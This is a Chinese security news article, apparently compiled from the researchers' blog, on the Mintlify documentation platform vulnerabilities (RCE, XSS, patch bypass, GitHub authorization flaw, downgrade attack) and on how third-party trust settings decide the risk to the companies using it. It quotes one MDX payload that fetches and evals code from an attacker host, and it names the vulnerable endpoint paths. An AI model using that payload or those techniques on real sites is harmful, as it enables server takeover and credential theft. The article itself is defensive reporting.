文章总结： 研究人员发现AI文档平台Mintlify存在多个严重漏洞，包括RCE、XSS及子域校验缺失等，可对X、Vercel、Discord等数百家企业发动供应链攻击，导致敏感数据泄露及代码执行。分析指出，企业对第三方服务的信任策略决定风险等级，隐式信任会导致主站被劫持，而采用显式不信任策略如独立域名和严格Cookie隔离，能有效防范此类0day风险。 综合评分： 91 文章分类： 供应链安全,漏洞分析,WEB安全,SRC活动,实战经验

如何通过一次供应链攻击同时攻破 X、Vercel、Cursor、Discord等数百家企业

综合编译

代码卫士

2025年12月22日 18:07 北京

 聚焦源代码安全，网罗国内外最新资讯！

编译：代码卫士

专栏·供应链安全

数字化时代，软件无处不在。软件如同社会中的“虚拟人”，已经成为支撑社会正常运转的最基本元素之一，软件的安全性问题也正在成为当今社会的根本性、基础性问题。

随着软件产业的快速发展，软件供应链也越发复杂多元，复杂的软件供应链会引入一系列的安全问题，导致信息系统的整体安全防护难度越来越大。近年来，针对软件供应链的安全攻击事件一直呈快速增长态势，造成的危害也越来越严重。

为此，我们推出“供应链安全”栏目。本栏目汇聚供应链安全资讯，分析供应链安全风险，提供缓解建议，为供应链安全保驾护航。

注：以往发布的部分供应链安全相关内容，请见文末“推荐阅读”部分。

昵称为Hackermon、eva和MDL的三名研究员从全球多家顶级企业使用的AI文档平台Mintlify中发现多个严重漏洞，可对企业用户如X、Vercel、Cursor、Discord等发动供应链攻击。这些研究员最终获得1.1万美元左右的赏金。如下是对他们博客文章的整理和编译。

Mintlify 是一个面向企业的SaaS文档平台，可使企业通过MDX文件创建文档，并由平台提供托管、样式设计等一站式服务。其客户不乏 Discord、X（原 Twitter）、Vercel、Cursor等著名厂商。

漏洞挖掘

16岁的白帽黑客 Hackermon 曾在过去几年中从 Discord 平台发现了近100个漏洞。今年11月，他在Mintlify文档平台中发现了一个跨站数据读取漏洞。漏洞的具体路径为/_mintlify/static/[subdomain]/[…route]，该端点因未验证请求子域名与当前主机是否匹配，允许攻击者通过目标网站（如Discord）的域名，读取任意其它Mintlify托管站点（如攻击者控制的站点）中的静态文件。Hackermon通过上传嵌入了JavaScript的SVG文件，并诱导目标站点访问该恶意文件的特定端点，最终实现了在目标域名下执行任意代码。Discord 为该漏洞发放了4000美元的赏金。

研究员 Eva利用MDX（支持JSX语法）的特性，在文档中插入恶意JavaScript表达式（{!!fetch(“https://attacker.kibty.town”).then((r) => r.text()).then((c) => eval(c))}），成功在服务器端Next.js应用环境中执行了代码，实现了远程代码执行（CVE-2025-67843）。该漏洞危害极大，因为攻击者不仅能完全控制服务器环境、窃取敏感环境变量和文件，还能污染Next.js缓存，从而对所有客户文档站点实施大规模XSS攻击或页面篡改。

Eva在分析服务器路由时，发现了另一个端点（/_mintlify/static/[subdomain]/[…path]），该端点未对请求子域名进行校验，允许通过目标域名（如discord.com）加载并执行攻击者自己Mintlify站点上的恶意SVG文件，从而实现了针对性跨站脚本攻击（CVE-2025-67842）。该漏洞可导致用户在点击链接后，在目标公司域名下执行任意脚本，进而可能窃取该域下的身份令牌或本地存储数据。

Hackermon和 Eva在Mintlify修复了通过/_mintlify/static/端点的针对性XSS漏洞后，通过审计修复后的路由代码发现了新漏洞，它实质上绕过了之前基于子域名校验的修复，使针对性XSS漏洞得以重现，攻击者能够再次通过目标企业的域名执行任意脚本。该补丁绕过漏洞的编号是 CVE-2025-67845。

另外，研究人员还发现了两个其它严重性稍低的漏洞：

• GitHub 越权访问漏洞（CVE-2025-67844）：Mintlify 在其 API 中设置 GitHub 代码仓库时，未对仓库的所有者/名称字段进行验证，允许用户将其设置为任何已获得授权访问的仓库。该漏洞攻击者能够查看新提交的详细信息（包括提交信息、哈希值、文件名、文件变更内容等）。
• 降级攻击漏洞（CVE-2025-67846）：Mintlify 使用 Vercel 来部署其客户端和管理面板。在使用 Vercel 时，一个常见的疏漏是未能移除包含漏洞的旧部署版本。因此，攻击者可以针对特定的旧版漏洞部署 ID、Git 分支或 Git 引用，利用这些旧版本重新实施已被修复的利用。

漏洞原因分析

研究人员指出，利用这些漏洞可对很多财富500强公司发动供应链攻击。

研究人员表示，在审计多家《财富》500强企业使用Mintlify这类第三方文档服务的安全状况时，其安全风险的高低并不仅仅取决于供应商的代码漏洞本身，而且更取决于企业自身对第三方服务的信任与隔离策略。

研究人员审计发现存在两种极端模式：一种是 “隐式信任”。企业为追求极致用户体验，将第三方服务视为自身资产同等对待，这导致了一系列致命的安全配置，包括：（1）为文档域名设置宽泛的CORS策略并允许携带凭证，使供应商域名能直接访问核心API；（2）将身份验证Cookie设置为顶级通配域名（如 .company.com），使得文档子域能自动获取用户主站会话；（3）未配置内容安全策略（CSP），使得恶意SVG等静态文件能在文档站内作为可执行环境运行。这些配置叠加，使得一个初始的文档站XSS漏洞能迅速升级，导致攻击者完全劫持用户在主站的身份与数据。

另一种是 “显式不信任” ，其安全哲学预设“第三方服务终将被入侵”。这些企业采取了有效的纵深防御措施：（1）顶级域名隔离，将文档部署在与主站完全不同的独立顶级域名上，从根本上切断了凭据与数据泄露的路径；（2）主机级Cookie作用域，即便使用子域，也将身份验证Cookie严格限定在核心应用子域（如 app.company.com），确保文档子域即使被攻陷也无法窃取主站会话。遵循此模式的企业，即使第三方文档平台存在漏洞，其影响也被严格隔离在文档站本身，无法危及核心业务与用户安全。

研究人员认为，把第三方依赖视作自身资产会造成严重后果，而很多家企业仅仅凭借良好的架构设计就成功化解了0day漏洞带来的实际威胁。

开源卫士试用地址：https://sast.qianxin.com/#/login

代码卫士试用地址：https://codesafe.qianxin.com

推荐阅读

vLLM 高危漏洞可导致RCE

开源AI框架 Ray 的0day已用于攻陷服务器和劫持资源

热门 React Native NPM 包中存在严重漏洞，开发人员易受攻击

10个npm包被指窃取 Windows、macOS 和 Linux 系统上的开发者凭据

热门 React Native NPM 包中存在严重漏洞，开发人员易受攻击

热门NPM库 “coa” 和“rc” 接连遭劫持，影响全球的 React 管道

开发人员注意：VSCode 应用市场易被滥用于托管恶意扩展

GitHub Copilot 严重漏洞可导致私有仓库源代码被盗

受 Salesforce 供应链攻击影响，全球汽车巨头 Stellantis 数据遭泄露

捷豹路虎数据遭泄露生产仍未恢复，幕后黑手或与 Salesforce-Salesloft 供应链攻击有关

十几家安全大厂信息遭泄露，谁是 Salesforce-Salesloft 供应链攻击的下一个受害者？

第三方集成应用 Drift OAuth 令牌被用于攻陷 Salesforce 实例，全球700+家企业受影响

黑客发动史上规模最大的 NPM 供应链攻击，影响全球10%的云环境

十几家安全大厂信息遭泄露，谁是 Salesforce-Salesloft 供应链攻击的下一个受害者？

第三方集成应用 Drift OAuth 令牌被用于攻陷 Salesforce 实例，全球700+家企业受影响

AI供应链易遭“模型命名空间复用”攻击

Frostbyte10：威胁全球供应链的10个严重漏洞

PyPI拦截1800个过期域名邮件，防御供应链攻击

PyPI恶意包利用依赖引入恶意行为，发动软件供应链攻击

黑客利用虚假 PyPI 站点钓鱼攻击Python 开发人员

700多个恶意误植域名库盯上RubyGems 仓库

NPM “意外” 删除 Stylus 合法包 全球流水线和构建被迫中断

固件开发和更新缺陷导致漏洞多年难修，供应链安全深受其害

NPM仓库被植入67个恶意包传播恶意软件

在线阅读版：《2025中国软件供应链安全分析报告》全文

NPM软件供应链攻击传播恶意软件

隐秘的 npm 供应链攻击：误植域名导致RCE和数据破坏

NPM恶意包利用Unicode 隐写术躲避检测

Aikido在npm热门包 rand-user-agent 中发现恶意代码

密币Ripple 的NPM 包 xrpl.js 被安装后门窃取私钥，触发供应链攻击

原文链接

https://gist.github.com/hackermondev/5e2cdc32849405fff6b46957747a2d28

本文由奇安信编译，不代表奇安信观点。转载请注明“转自奇安信代码卫士 https://codesafe.qianxin.com”。

奇安信代码卫士 (codesafe)

国内首个专注于软件开发安全的产品线。

    觉得不错，就点个 “在看” 或 “赞” 吧~

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：代码卫士 综合编译《如何通过一次供应链攻击同时攻破 X、Vercel、Cursor、Discord等数百家企业》